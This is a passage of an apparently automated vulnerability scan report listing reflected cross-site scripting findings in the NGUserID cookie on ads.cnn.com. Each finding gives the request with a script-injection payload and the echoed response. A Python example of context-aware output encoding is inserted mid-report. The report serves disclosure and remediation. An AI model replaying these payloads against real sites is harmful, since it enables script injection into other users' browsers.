Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1e05e1"><script>alert(1)</script>d9fa763ff0e; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:40 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:40 GMT
Pragma: no-cache
Content-Length: 3335
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
17,1067,1285,1589,1678,1686,1735,3450,3615,4406,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1e05e1"><script>alert(1)</script>d9fa763ff0e%2CTIL%2C1313434014105&amp;random=bnkhyrb,bhesAmqdozmwz&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1e05e1"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Ed9fa763ff0e" width="1"
...[SNIP]...

1.90. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5e05"><script>alert(1)</script>f065f3bcb04 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1b5e05"><script>alert(1)</script>f065f3bcb04; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:30 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:30 GMT
Pragma: no-cache
Content-Length: 3779
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3450,3615,4407,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1b5e05"><script>alert(1)</script>f065f3bcb04%2CTIL%2C1313434014105&Redirect=http://ad.doubleclick.net/clk;243518150;67034621;x;pc=[TPAS_ID]">
...[SNIP]...

1.91. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0bde"><script>alert(1)</script>e6c2b1c7b30 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1d0bde"><script>alert(1)</script>e6c2b1c7b30; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:45 GMT
Pragma: no-cache
Content-Length: 3226
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
17,1067,1285,1589,1678,1686,1735,3450,3615,4408,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1d0bde"><script>alert(1)</script>e6c2b1c7b30%2CTIL%2C1313434014105&amp;random=bhhgtwz,bhesAmvdozoty&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1d0bde"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Ee6c2b1c7b30" width="1"
...[SNIP]...

1.92. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c729"><script>alert(1)</script>2ee5bc105c was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-19c729"><script>alert(1)</script>2ee5bc105c; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:27 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:27 GMT
Pragma: no-cache
Content-Length: 3557
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3450,3615,4409,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-19c729"><script>alert(1)</script>2ee5bc105c%2CTIL%2C1313434014105&Redirect=http://www.money.com">
...[SNIP]...

1.93. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56e12"><script>alert(1)</script>b6c840f1983 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-156e12"><script>alert(1)</script>b6c840f1983; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:31 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:31 GMT
Pragma: no-cache
Content-Length: 912
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=2244,2743,3285,6298,6520,8598,10240,17251,18961,19419,25128,25342,25344,25412,32749,32922,33852,34172,345
...[SNIP]...
682,685,686,917,1067,1285,1589,1678,1686,1735,4443,37359,47128,47457,52263,52901,56058,56872,57896,58683,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-156e12"><script>alert(1)</script>b6c840f1983%2CTIL%2C1313433990029&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.94. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3205"><script>alert(1)</script>628c3f0a33e was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1a3205"><script>alert(1)</script>628c3f0a33e; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:47:44 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:47:44 GMT
Pragma: no-cache
Content-Length: 912
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=2244,2743,3285,6298,6520,8598,10240,17251,18961,19419,25128,25342,25344,25412,32749,32922,33852,34172,345
...[SNIP]...
682,685,686,917,1067,1285,1589,1678,1686,1735,4443,37359,47128,47457,52263,52901,56058,56872,57896,58683,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1a3205"><script>alert(1)</script>628c3f0a33e%2CTIL%2C1313434014105&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.95. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf45"><script>alert(1)</script>3d3023a0a05 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-13cf45"><script>alert(1)</script>3d3023a0a05; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:50:21 GMT
Server: Apache
Vary: Cookie
AdServer: ads1ad58:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:50:21 GMT
Pragma: no-cache
Content-Length: 911
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=2244,2743,3285,6298,6520,8598,10240,17251,18961,19419,25128,25342,25344,25412,32749,32922,33852,34172,345
...[SNIP]...
,682,685,686,917,1067,1285,1589,1678,1686,1735,4443,37359,47128,47457,52263,52901,56058,56872,57896,58683,58702,61089,61263,61887,61908,61913,63267,116729&RawValues=NGUSERID%2Caa55a22-30407-167278533-13cf45"><script>alert(1)</script>3d3023a0a05%2CTIL%2C1313434106153&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.96. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066

Issue detail

The value of the NGUserID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 543a2'-alert(1)-'d4f8843d407 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
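The remediation note above is the scanner's generic advice for the script-string context; the findings in this section actually cover three sinks for the same NGUserID cookie (element text, a URL inside a double-quoted attribute, and a single-quoted JavaScript string), and each needs its own encoding. The following Python is an added example for this page, not the ad server's code and not part of the XSS.CX report. It places the cookie value into the three sinks first the way the report shows (no encoding), then the hardened way: an allowlist check on the value's shape (the format is an assumption inferred from the single legitimate value visible in the report), percent-encoding for the value inside the URL followed by HTML escaping of the attribute, a JSON-derived literal with `<`, `>`, `&`, `'` and the U+2028/2029 line terminators escaped for the script sink, and HTML escaping for the text sink. The NGUserID prefix and the two payloads are taken from the report; the function names and the markup template are constructed.

```python
import html
import json
import re
from urllib.parse import quote

# From the report: the benign NGUserID the scanner kept, and two of its payloads
# (issue 1.89, attribute context; issue 1.96, JavaScript string context).
NGUSERID = "aa55a22-30407-167278533-1"
PROBE_ATTR = 'e05e1"><script>alert(1)</script>d9fa763ff0e'
PROBE_JS = "543a2'-alert(1)-'d4f8843d407"

# Assumed legitimate shape (hex block, three decimal fields), inferred from the one
# value in the report. Validation is the first line of defence, encoding the second.
_NGUSERID_RE = re.compile(r"^[0-9a-f]+-\d+-\d+-\d+$")


def is_valid_nguserid(value: str) -> bool:
    return bool(_NGUSERID_RE.match(value))


def js_string_literal(value: str) -> str:
    """Render `value` as a JavaScript string literal that is safe inside an HTML
    <script> block: JSON escaping handles quotes, backslashes and control
    characters; the extra \\uXXXX escapes stop a literal </script> from ending
    the block, a line separator from ending the statement, and quotes from
    mattering if the literal is later pasted into a single-quoted context."""
    s = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("'", "\\u0027"), ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        s = s.replace(ch, esc)
    return s


def render_unsafe(user_id: str) -> str:
    """The reported behaviour: the raw cookie value is concatenated into a URL in
    a double-quoted src attribute, a single-quoted JS string, and element text."""
    return (
        f'<img src="/event.ng/Type=click&RawValues=NGUSERID%2C{user_id}" width="1" height="1">\n'
        f"<script>var ngUserId = '{user_id}';</script>\n"
        f"<span>{user_id}</span>"
    )


def render_safe(user_id: str) -> str:
    """Same three sinks, each encoded for its own context from the inside out:
    percent-encode the value inside the URL, then HTML-escape the attribute;
    emit a proper JS literal; HTML-escape the text node."""
    in_url = html.escape(quote(user_id, safe=""), quote=True)
    return (
        f'<img src="/event.ng/Type=click&amp;RawValues=NGUSERID%2C{in_url}" width="1" height="1">\n'
        f"<script>var ngUserId = {js_string_literal(user_id)};</script>\n"
        f"<span>{html.escape(user_id, quote=True)}</span>"
    )


def render(user_id: str) -> str:
    """What the server should do: reject values that are not NGUserID-shaped,
    encode the ones that are."""
    if not is_valid_nguserid(user_id):
        raise ValueError("NGUserID does not match the expected format")
    return render_safe(user_id)


def breaks_out(rendered: str, probe: str) -> bool:
    """True if the probe survived into the output verbatim."""
    return probe in rendered


if __name__ == "__main__":
    for probe in (PROBE_ATTR, PROBE_JS):
        tainted = NGUSERID + probe
        print("unsafe breaks out:", breaks_out(render_unsafe(tainted), probe))
        print("safe breaks out:  ", breaks_out(render_safe(tainted), probe))
        print("passes allowlist: ", is_valid_nguserid(tainted))
    print(render(NGUSERID))
```

The `breaks_out` check is deliberately crude (substring presence); the context classifier is the stronger test. Note that `json.dumps` alone leaves `'`, `<` and `>` untouched, which is why the script-sink helper adds its own escapes: a JSON-valid literal is not automatically safe inside an HTML document.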

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1543a2'-alert(1)-'d4f8843d407; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
